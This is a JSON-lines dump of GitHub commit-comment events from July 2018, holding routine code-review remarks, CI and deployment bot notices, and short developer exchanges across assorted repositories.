{"id":"7915137419","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29587476,"position":17,"line":88,"path":"src/System.Security.Claims/src/System/Security/Claims/GenericPrincipal.cs","commit_id":"cb84728c6853dde522d2cc6a703a9a246622a9a1","created_at":"2018-07-03T21:42:22Z","updated_at":"2018-07-03T21:42:22Z","author_association":"MEMBER","body":"This should be static method. There is no reason for this to be instance method."}},"created_at":"2018-07-03T21:42:22Z"}
{"id":"7915140257","type":"CommitCommentEvent","actor":{"login":"skirb09"},"repo":{"name":"skirb09/kirbsidefarms"},"payload":{"comment":{"id":29587481,"position":1,"line":1,"path":"README.md","commit_id":"d43e704a7513927097e122897590a7b0b7962558","created_at":"2018-07-03T21:43:07Z","updated_at":"2018-07-03T21:43:07Z","author_association":"OWNER","body":"Kirbside Farms is a project that will kickoff the home page to go along with Kirbside Farm's plan.\r\n\r\nIt has not yet been determined as to how the site/plan will operate but this is the beginning!"}},"created_at":"2018-07-03T21:43:07Z"}
{"id":"7915140428","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587482,"position":26,"line":43,"path":"test/remittance.js","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T21:43:09Z","updated_at":"2018-07-03T21:43:09Z","author_association":"NONE","body":"I would just make a `.call` to the contract's `getKeccak` function."}},"created_at":"2018-07-03T21:43:09Z"}
{"id":"7915140443","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/tundecsapo"},"payload":{"comment":{"id":29587483,"position":25,"line":62,"path":"week-07/day-04/reddit/server.js","commit_id":"a5701cadc21f6ea42d04ca391262c75840bd3d06","created_at":"2018-07-03T21:43:10Z","updated_at":"2018-07-03T21:43:10Z","author_association":"NONE","body":"Use the `?` style!"}},"created_at":"2018-07-03T21:43:10Z"}
{"id":"7915141529","type":"CommitCommentEvent","actor":{"login":"jangorecki"},"repo":{"name":"martakarass/convo"},"payload":{"comment":{"id":29587488,"position":31,"line":31,"path":"man/RunningMean.Rd","commit_id":"4cb448745f4562c77e611997963d7f44b8041555","created_at":"2018-07-03T21:43:27Z","updated_at":"2018-07-03T21:43:27Z","author_association":"NONE","body":"as I mentioned on conf, you can try this implementation\r\n```r\r\ndevtools::install_github(\"Rdatatable/data.table@roll\")\r\nfrollmean(x, 100)\r\n```\r\nto get exact match you might have to `ans[!is.na(ans)]` because `frollmean` will not alter dimensionality vs input vector."}},"created_at":"2018-07-03T21:43:27Z"}
{"id":"7915144636","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29587495,"position":19,"line":17,"path":"test/remittance.js","commit_id":"7d34de57247dcf8927c190ff21b745c48120c6a8","created_at":"2018-07-03T21:44:17Z","updated_at":"2018-07-03T21:44:17Z","author_association":"NONE","body":"`alice 0`, `carol 1`, `bob 2`. Trying to throw us off here? ;)"}},"created_at":"2018-07-03T21:44:17Z"}
{"id":"7915148637","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29587507,"position":3,"line":3,"path":"ninthLesson/HW9-script.js","commit_id":"840cdb89e25446608d08e12643f4fb2549d38e99","created_at":"2018-07-03T21:45:20Z","updated_at":"2018-07-03T21:45:20Z","author_association":"NONE","body":"не стоит создавать лишнюю переменную с, лучше сразу возвращать return (a+b)/2"}},"created_at":"2018-07-03T21:45:20Z"}
{"id":"7915149630","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29587508,"position":10,"line":10,"path":"ninthLesson/HW9-script.js","commit_id":"840cdb89e25446608d08e12643f4fb2549d38e99","created_at":"2018-07-03T21:45:36Z","updated_at":"2018-07-03T21:45:36Z","author_association":"NONE","body":"то же самое, что и в комментарии выше\r\n"}},"created_at":"2018-07-03T21:45:36Z"}
{"id":"7915156843","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29587519,"position":2,"line":2,"path":"lohica-js-network/src/actions/reqActions.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-03T21:47:31Z","updated_at":"2018-07-03T21:47:31Z","author_association":"NONE","body":"naming should be refactored"}},"created_at":"2018-07-03T21:47:31Z"}
{"id":"7915158510","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29587523,"position":7,"line":7,"path":"lohica-js-network/src/actions/reqActions.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-03T21:47:57Z","updated_at":"2018-07-03T21:47:57Z","author_association":"NONE","body":"request generation much better here"}},"created_at":"2018-07-03T21:47:57Z"}
{"id":"7915159923","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"bursevich/js-Prefr"},"payload":{"comment":{"id":29587527,"position":89,"line":89,"path":"ninthLesson/HW9-script.js","commit_id":"840cdb89e25446608d08e12643f4fb2549d38e99","created_at":"2018-07-03T21:48:17Z","updated_at":"2018-07-03T21:48:17Z","author_association":"NONE","body":"то же самое что и в комментариях выше. сразу делаем действие, здесь нет надобности в промежуточной переменной: `if ( j % 2 == 0)`"}},"created_at":"2018-07-03T21:48:17Z"}
{"id":"7915169340","type":"CommitCommentEvent","actor":{"login":"Hizqeelrz"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29587551,"position":null,"line":null,"path":null,"commit_id":"a31b5fed1f4caa5f18a5d9825075f372ad9f96ff","created_at":"2018-07-03T21:50:47Z","updated_at":"2018-07-03T21:50:47Z","author_association":"NONE","body":"@ZNaumovic \r\nYou have several typos in your code Firstly after your customers id replace **.js.delete** with **.js-delete** as jQuery will take **.js** and **.delete** two different classes.\r\nSecondly, you missed **JQuery ($)** Sign while calling api in your url it will be $(button)\r\nThirdly, match your data-customers-id attribute both should be same you are missing an s \r\n\r\nHope This helps :)"}},"created_at":"2018-07-03T21:50:47Z"}
{"id":"7915178127","type":"CommitCommentEvent","actor":{"login":"adamdecaf"},"repo":{"name":"FiloSottile/mkcert"},"payload":{"comment":{"id":29587570,"position":null,"line":null,"path":null,"commit_id":"bf29b706fc6b43ec1b3dbaeaebb006d38bb2b78f","created_at":"2018-07-03T21:53:15Z","updated_at":"2018-07-03T21:53:15Z","author_association":"CONTRIBUTOR","body":"@FiloSottile Won't this break on Go 1.11? "}},"created_at":"2018-07-03T21:53:15Z"}
{"id":"7915180260","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29587575,"position":28,"line":28,"path":"lohica-js-network/src/actions/userAccountActions.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-03T21:53:52Z","updated_at":"2018-07-03T21:53:52Z","author_association":"NONE","body":"why not to that in one then?"}},"created_at":"2018-07-03T21:53:52Z"}
{"id":"7915182473","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29587582,"position":9,"line":9,"path":"lohica-js-network/src/components/commonHandlers/requestGenerator.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-03T21:54:28Z","updated_at":"2018-07-03T21:54:28Z","author_association":"NONE","body":"much better"}},"created_at":"2018-07-03T21:54:28Z"}
{"id":"7915184645","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29587585,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-03T21:55:05Z","updated_at":"2018-07-03T21:55:05Z","author_association":"OWNER","body":"`Maybe [Sentence]` is redundant, in the sense that `[]` does just as well as `Nothing`."}},"created_at":"2018-07-03T21:55:05Z"}
{"id":"7915189541","type":"CommitCommentEvent","actor":{"login":"6ewis"},"repo":{"name":"nguyenht33/react-hot-cold"},"payload":{"comment":{"id":29587596,"position":54,"line":38,"path":"src/components/game.js","commit_id":"4baadcfc4ecd803aeea27ba200aececcbc6d0213","created_at":"2018-07-03T21:56:23Z","updated_at":"2018-07-03T21:56:23Z","author_association":"NONE","body":"can you remove the console logs"}},"created_at":"2018-07-03T21:56:23Z"}
{"id":"7915190254","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/ITLab-Back"},"payload":{"comment":{"id":29587599,"position":null,"line":null,"path":null,"commit_id":"570e5fdf98eee43068c16f777e6245a0e97018e3","created_at":"2018-07-03T21:56:35Z","updated_at":"2018-07-03T21:56:35Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Добавить поле owner к equipment](https://trello.com/c/Fc3RO8f3/46-%D0%B4%D0%BE%D0%B1%D0%B0%D0%B2%D0%B8%D1%82%D1%8C-%D0%BF%D0%BE%D0%BB%D0%B5-owner-%D0%BA-equipment)"}},"created_at":"2018-07-03T21:56:35Z"}
{"id":"7915190906","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29587601,"position":10,"line":10,"path":"lohica-js-network/src/components/userAccountComponents/UserInfoComponent.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-03T21:56:45Z","updated_at":"2018-07-03T21:56:45Z","author_association":"NONE","body":"I like the idea of creating separate component for user info"}},"created_at":"2018-07-03T21:56:45Z"}
{"id":"7915194018","type":"CommitCommentEvent","actor":{"login":"ShroukRagheb"},"repo":{"name":"MazenAshraf/ASUMobiCarG41"},"payload":{"comment":{"id":29587604,"position":null,"line":null,"path":null,"commit_id":"4c9f290b4bcd78703ad5fb67c6f26babba2ebc23","created_at":"2018-07-03T21:57:36Z","updated_at":"2018-07-03T21:57:36Z","author_association":"COLLABORATOR","body":"counter_A++;  // increment Motor A counter value\r\n} \r\n \r\n\r\nint CMtoSteps(float cm) {\r\n \r\n  int result;  \r\n  float circumference = (wheeldiameter * 3.14) / 10; \r\n  float cm_step = circumference / stepcount;  \r\n  \r\n  float f_result = cm / cm_step;  \r\n  result = (int) f_result; \r\n  \r\n  return result;  \r\n Serial.println(\"result\");\r\n Serial.println(result);\r\n}\r\n\r\n\r\nvoid MoveForward(int steps, int mspeed) \r\n{\r\n   counter_A = 0;  \r\n   Forward();\r\n   \r\n  \r\n   while (steps > counter_A ) {\r\n   \r\n    if (steps > counter_A) {\r\n    analogWrite(ena, mspeed);\r\n    } else {\r\n    analogWrite(ena, 0);\r\n    }\r\n   \r\n   }\r\n    \r\n  \r\n  analogWrite(ena, 0);\r\n  analogWrite(enb, 0);"}},"created_at":"2018-07-03T21:57:36Z"}
{"id":"7915195960","type":"CommitCommentEvent","actor":{"login":"monodop"},"repo":{"name":"saidur-nashville/my_project"},"payload":{"comment":{"id":29587611,"position":null,"line":null,"path":null,"commit_id":"fb940be12ce66ecf9a7c7324348f957410b02c71","created_at":"2018-07-03T21:58:05Z","updated_at":"2018-07-03T21:58:05Z","author_association":"NONE","body":"Cool, mine is hunter2"}},"created_at":"2018-07-03T21:58:05Z"}
{"id":"7915198927","type":"CommitCommentEvent","actor":{"login":"FiloSottile"},"repo":{"name":"FiloSottile/mkcert"},"payload":{"comment":{"id":29587618,"position":null,"line":null,"path":null,"commit_id":"bf29b706fc6b43ec1b3dbaeaebb006d38bb2b78f","created_at":"2018-07-03T21:58:54Z","updated_at":"2018-07-03T21:58:54Z","author_association":"OWNER","body":"@adamdecaf Nope, tags are applied to all following versions too."}},"created_at":"2018-07-03T21:58:54Z"}
{"id":"7915199937","type":"CommitCommentEvent","actor":{"login":"timmyrs"},"repo":{"name":"hellshltd/Universal-Bypass"},"payload":{"comment":{"id":29587622,"position":9,"line":40,"path":"_locales/en/messages.json","commit_id":"a57017c14206709b43eec18018352c6dee6d9f16","created_at":"2018-07-03T21:59:10Z","updated_at":"2018-07-03T21:59:10Z","author_association":"MEMBER","body":"I've added two new strings in 5.1 @andgar2010 @xerta555 "}},"created_at":"2018-07-03T21:59:10Z"}
{"id":"7915205866","type":"CommitCommentEvent","actor":{"login":"prmichaelsen"},"repo":{"name":"saidur-nashville/my_project"},"payload":{"comment":{"id":29587637,"position":null,"line":null,"path":null,"commit_id":"fb940be12ce66ecf9a7c7324348f957410b02c71","created_at":"2018-07-03T22:00:37Z","updated_at":"2018-07-03T22:00:37Z","author_association":"NONE","body":"all I see is stars"}},"created_at":"2018-07-03T22:00:37Z"}
{"id":"7915206878","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/matecserven"},"payload":{"comment":{"id":29587641,"position":25,"line":28,"path":"week-07/day-3/bookstore/index.js","commit_id":"b02eec4f32071fad168e27975f532e28f3ab85eb","created_at":"2018-07-03T22:00:50Z","updated_at":"2018-07-03T22:00:50Z","author_association":"NONE","body":"😍 "}},"created_at":"2018-07-03T22:00:50Z"}
{"id":"7915207693","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29587642,"position":null,"line":null,"path":null,"commit_id":"1da7e86ee572ef60228fff0a3e1cc62d24532213","created_at":"2018-07-03T22:01:02Z","updated_at":"2018-07-03T22:01:02Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-sitee](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-sitee).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-sitee-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T22:01:02Z"}
{"id":"7915207783","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29587643,"position":44,"line":48,"path":"server.js","commit_id":"52b8b2b0d6d2128acfa6f092d768fa5484d057a3","created_at":"2018-07-03T22:01:03Z","updated_at":"2018-07-03T22:01:03Z","author_association":"NONE","body":"looks good!"}},"created_at":"2018-07-03T22:01:03Z"}
{"id":"7915208485","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/nb_conda_kernels-feedstock"},"payload":{"comment":{"id":29587644,"position":null,"line":null,"path":null,"commit_id":"05821baae93c54bf5552c1773a5bf39af1973d8f","created_at":"2018-07-03T22:01:13Z","updated_at":"2018-07-03T22:01:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mcg1969 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-03T22:01:13Z"}
{"id":"7915208792","type":"CommitCommentEvent","actor":{"login":"tungfam"},"repo":{"name":"NextLevel/NextLevel"},"payload":{"comment":{"id":29587647,"position":null,"line":null,"path":null,"commit_id":"050ba1bb1f078a12a41a22d2dda057f87765068b","created_at":"2018-07-03T22:01:17Z","updated_at":"2018-07-03T22:01:17Z","author_association":"NONE","body":"It did really help. Thanks!\r\n\r\nIf someone wants a better quality try to set bitRate to `20800000`. But note it will cause video size."}},"created_at":"2018-07-03T22:01:17Z"}
{"id":"7915209982","type":"CommitCommentEvent","actor":{"login":"CAPCHIK"},"repo":{"name":"ITLabRTUMIREA/SCVR"},"payload":{"comment":{"id":29587650,"position":23,"line":68,"path":"Source/SCVR/WebSybSystem/JsonSCVR.cpp","commit_id":"1558c755013f65e02765053cecd9a4c7eef4ef5d","created_at":"2018-07-03T22:01:36Z","updated_at":"2018-07-03T22:01:36Z","author_association":"NONE","body":" Интересно, а ты сам понимаешь, что за static_cast и MakeShareable? @MrWoWander "}},"created_at":"2018-07-03T22:01:36Z"}
{"id":"7915210974","type":"CommitCommentEvent","actor":{"login":"martakarass"},"repo":{"name":"martakarass/convo"},"payload":{"comment":{"id":29587654,"position":31,"line":31,"path":"man/RunningMean.Rd","commit_id":"4cb448745f4562c77e611997963d7f44b8041555","created_at":"2018-07-03T22:01:52Z","updated_at":"2018-07-03T22:01:52Z","author_association":"OWNER","body":"Thanks a ton!\nI really really appreciate you sharing this with me.\nI think realistically I will be able to take a closer look at this next\nweek.\n\nThanks a lot!\n\n\nBests / Pozdrawiam,\nMarta Karas\n\n\n\n\nOn 3 July 2018 at 23:43, Jan Gorecki <notifications@github.com> wrote:\n\n> as I mentioned on conf, you can try this implementation\n>\n> devtools::install_github(\"Rdatatable/data.table@roll\")\n> frollmean(x, 100)\n>\n> to get exact match you might have to ans[!is.na(ans)] because frollmean\n> will not alter dimensionality vs input vector.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/martakarass/convo/commit/4cb448745f4562c77e611997963d7f44b8041555#commitcomment-29587488>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFdxy3va1aU3P0tKb9rHzmeWcEf1QTwpks5uC-V_gaJpZM4VBquE>\n> .\n>\n"}},"created_at":"2018-07-03T22:01:52Z"}
{"id":"7915221408","type":"CommitCommentEvent","actor":{"login":"B00735026"},"repo":{"name":"alexlinsy/CSCI3130-Project-Group5"},"payload":{"comment":{"id":29587673,"position":null,"line":null,"path":null,"commit_id":"8187c369cc85774ee5cc85c130e5515339a676f9","created_at":"2018-07-03T22:04:48Z","updated_at":"2018-07-03T22:04:48Z","author_association":"COLLABORATOR","body":"Xuanzhe Meng"}},"created_at":"2018-07-03T22:04:48Z"}
{"id":"7915232750","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29587689,"position":null,"line":null,"path":null,"commit_id":"bd0a17d773dd8b7f42047b47037b76681e1a2074","created_at":"2018-07-03T22:07:49Z","updated_at":"2018-07-03T22:07:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-403](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-403).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-403-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-03T22:07:49Z"}
{"id":"7915234232","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/matecserven"},"payload":{"comment":{"id":29587693,"position":19,"line":52,"path":"week-07/day-4/reddit_project/server.js","commit_id":"68660558d7120441bc186951b4ae13901932b977","created_at":"2018-07-03T22:08:07Z","updated_at":"2018-07-03T22:08:07Z","author_association":"NONE","body":"Use `?` style everywhere"}},"created_at":"2018-07-03T22:08:07Z"}
{"id":"7915238493","type":"CommitCommentEvent","actor":{"login":"kmsaleh"},"repo":{"name":"Mohabsaid/Power-to-Gas"},"payload":{"comment":{"id":29587700,"position":null,"line":null,"path":null,"commit_id":"3049a4506d8dea273f120bc48f3911e82372e7da","created_at":"2018-07-03T22:09:20Z","updated_at":"2018-07-03T22:09:20Z","author_association":"COLLABORATOR","body":"Review of Final Model Version 10; solutions to problems identified.\r\n\r\nNote: I’ve looked at the overall system only and ran the simulation, if you’ve problems with individual systems then it falls on you to flag them out.\r\n\r\nProblem 1:\r\n\r\nLooking at the input signal (current from load profile of single trip); it appears you are scaling the time, 1 sec to represent 1 hour approx. However, there is no indication that the dynamics of your model understood this time scale, and behaves according to the actual simulation time. Therefore the behavior does not represent the performance of the system during one trip at all. Notice the figure below from the power output, the settling time about 5 sec, you’d erroneously interpret that to 5 hours, i.e. the ship will suffer from poor power output for almost half its daily sailing hours.\r\n\r\n\r\n\r\n\r\nsettlingTime.jpg\r\n​\r\nProblem 2:\r\n\r\nOn my laptop, , Intel Corei5, 2.5GHz, 4GB, the simulation of 250 sec took well over 1 hour to complete. I assume it is your intention this is equivalent to 10 days+, which does not correlate with the system dynamics. Therefore to simulate 10 days you need 5 to 6 months to complete the simulation if things are linear.  \r\n\r\nIdentifying the root cause of the problem:\r\n\r\nSimulink models dynamic behavior of systems by solving ordinary differential equations. Therefore in a complex system, it is top priority to simplify the model in such a way that ODE’s become as simple as possible. If you cannot control that, then be very careful in solver selection and step time. Being aware of the accuracy needed, a small step size would become overkill for systems which does not require this degree of accuracy, provided that the selected step size does not generate errors in your model.\r\n\r\nReviewing your model and considering our options, it is evident that your model exhibit ‘stiff ODE behavior’. Stiff ODE means that the equation is numerically unstable and the slightest change in the equation parameters yields wildly different outcome. Therefore I’ve selected ode15s solver and step size 0.005 sec (powergui) instead of ‘auto selection’. The simulation time on my laptop has tremendously improved, 250 sec in 8+ minutes. At 0.01 sec step time I achieved real-time simulation on my laptop(250 sec in 4 min) . There’ve been no noticeable loss of accuracy at all for our purpose. The below figures are the scope outputs of the original model and the solution runs (0.005 and 0.01). (note I stopped the original simulation midway)\r\n\r\n \r\n\r\nscope.jpg\r\n​\r\nscope_ode15s_005s.jpg\r\nscope_ode15s_01s.jpg\r\n​\r\n​\r\nNote that you should analyze all simulation results to review and adjust sizing of system components, you can achieve this by using scope charts and/or writing simulink signals to file (you can export to excel) as shown below\r\n\r\n \r\n\r\nmodel.jpg\r\n​\r\nFile.jpg\r\n​\r\n \r\n\r\nConclusion:\r\n\r\nü  Your assumption of time scale 1 sec: 1 hour is not correct with respect to system dynamics.\r\n\r\nü  Use suitable solver for your model (ode15s is one option)\r\n\r\nü  Try the biggest step size without compromising the simulation accuracy to speed up simulation (powergui)\r\n\r\nü  Run the simulation on the most powerful computer you can get (use the lab server but dedicate it to your model for the duration of the simulation)\r\n\r\nü  You have not yet analyzed the simulation results. Work harder."}},"created_at":"2018-07-03T22:09:20Z"}
{"id":"7915240937","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/matecserven"},"payload":{"comment":{"id":29587706,"position":34,"line":50,"path":"week-07/day-4/reddit_project/server.js","commit_id":"7a754c079d4180d3eeef2a8645063b06bb3cf014","created_at":"2018-07-03T22:10:04Z","updated_at":"2018-07-03T22:10:04Z","author_association":"NONE","body":"1) Use single quotes\r\n2) It's working with `rows.insertId` as well"}},"created_at":"2018-07-03T22:10:04Z"}
{"id":"7915243117","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29587712,"position":null,"line":null,"path":null,"commit_id":"03e5f2f3334f2224bccf0b80c151b42de018ce7e","created_at":"2018-07-03T22:10:42Z","updated_at":"2018-07-03T22:10:42Z","author_association":"COLLABORATOR","body":"Test for <code>Optimieren</code> interface\r\nI think this is what I'm supposed to check for, correct me if I'm wrong\r\nif you wanna be a cool dood like adachi then make an interface for everything else you want tested"}},"created_at":"2018-07-03T22:10:42Z"}
{"id":"7915245537","type":"CommitCommentEvent","actor":{"login":"marchingband"},"repo":{"name":"marchingband/react-test"},"payload":{"comment":{"id":29587714,"position":null,"line":null,"path":null,"commit_id":"1e0ce26565ceaffe08c7fc085075fe8ea992f4dc","created_at":"2018-07-03T22:11:25Z","updated_at":"2018-07-03T22:11:25Z","author_association":"OWNER","body":"ok i kinda see how this works\r\n"}},"created_at":"2018-07-03T22:11:25Z"}
{"id":"7915267495","type":"CommitCommentEvent","actor":{"login":"AutoHunter"},"repo":{"name":"AutoHunter/chefling_prod"},"payload":{"comment":{"id":29587767,"position":28,"line":223,"path":"base.py","commit_id":"c24cbfd0d746f63778a5afa4d6ba11cb877d7644","created_at":"2018-07-03T22:17:57Z","updated_at":"2018-07-03T22:17:57Z","author_association":"OWNER","body":"_def verify_application_id(receive_app_id)_ needs future attention."}},"created_at":"2018-07-03T22:17:57Z"}
{"id":"7915274567","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29587782,"position":null,"line":null,"path":null,"commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T22:20:09Z","updated_at":"2018-07-03T22:20:09Z","author_association":"OWNER","body":"@StefanRRichter i should be done in a week's time from now with all the changes, i will post the PR against master as you suggested.\r\nFor the entropy location part, I did play around it a bit earlier. What i noticed was S3 was still throttling if the entropy was in the later part of the url. There isn't much public documentation about the recommended approach, but placing it in the beginning definitely increased the throughput.\r\nMy thinking is keeping it flexible allows users to find the best outcome depending upon how they want to structure the \"state.backend.fs.checkpointdir\" path. Enforcing the entropy in the in the s3 root might not be appropriate without knowing the path. What do you think?"}},"created_at":"2018-07-03T22:20:09Z"}
{"id":"7915279099","type":"CommitCommentEvent","actor":{"login":"K6205"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29587789,"position":null,"line":null,"path":null,"commit_id":"be2ca895f31864572d523fb8e6f7da6941ccf4d6","created_at":"2018-07-03T22:21:32Z","updated_at":"2018-07-03T22:21:32Z","author_association":"COLLABORATOR","body":"permanently moved to CONTRIBUTING.MD"}},"created_at":"2018-07-03T22:21:32Z"}
{"id":"7915281823","type":"CommitCommentEvent","actor":{"login":"MasterQ32"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29587796,"position":null,"line":null,"path":null,"commit_id":"68c60394959c1c6a1446c49cf7a344939c9b4874","created_at":"2018-07-03T22:22:22Z","updated_at":"2018-07-03T22:22:22Z","author_association":"CONTRIBUTOR","body":":heart_eyes: "}},"created_at":"2018-07-03T22:22:22Z"}
{"id":"7915284677","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29587800,"position":null,"line":null,"path":null,"commit_id":"26ef232cc7d9da2d1049e75cbe2cb377bc753295","created_at":"2018-07-03T22:23:16Z","updated_at":"2018-07-03T22:23:16Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-15](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-15).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-15-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-03T22:23:16Z"}
{"id":"7915286444","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29587804,"position":null,"line":null,"path":null,"commit_id":"ab9544950cbd749ca4fa37861cf914d8b15b1619","created_at":"2018-07-03T22:23:47Z","updated_at":"2018-07-03T22:23:47Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/dalexsoto-foundation-fixbuild/1/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : org.jenkinsci.plugins.workflow.steps.FlowInterruptedException\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/dalexsoto-foundation-fixbuild/1//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/dalexsoto-foundation-fixbuild/ab9544950cbd749ca4fa37861cf914d8b15b1619/1/jenkins-results/api-diff/index.html)\n⚠️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/dalexsoto-foundation-fixbuild/ab9544950cbd749ca4fa37861cf914d8b15b1619/1/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\nℹ️ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/dalexsoto-foundation-fixbuild/ab9544950cbd749ca4fa37861cf914d8b15b1619/1/jenkins-results/generator-diff/index.html) (please review changes)\n"}},"created_at":"2018-07-03T22:23:47Z"}
{"id":"7915304198","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29587851,"position":null,"line":null,"path":null,"commit_id":"13d69af0a4d201ab12d2558d9732b5c7f5e78c35","created_at":"2018-07-03T22:29:25Z","updated_at":"2018-07-03T22:29:25Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13d69af0a4d201ab12d2558d9732b5c7f5e78c35-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-03T22:29:25Z"}
{"id":"7915311115","type":"CommitCommentEvent","actor":{"login":"ElvishJerricco"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29587866,"position":5,"line":76,"path":"pkgs/top-level/haskell-packages.nix","commit_id":"c85f23a82a6ae9a5b38a789897e455b11983e528","created_at":"2018-07-03T22:31:26Z","updated_at":"2018-07-03T22:31:26Z","author_association":"CONTRIBUTOR","body":"@peti should this have been `ghc821Binary`?"}},"created_at":"2018-07-03T22:31:26Z"}
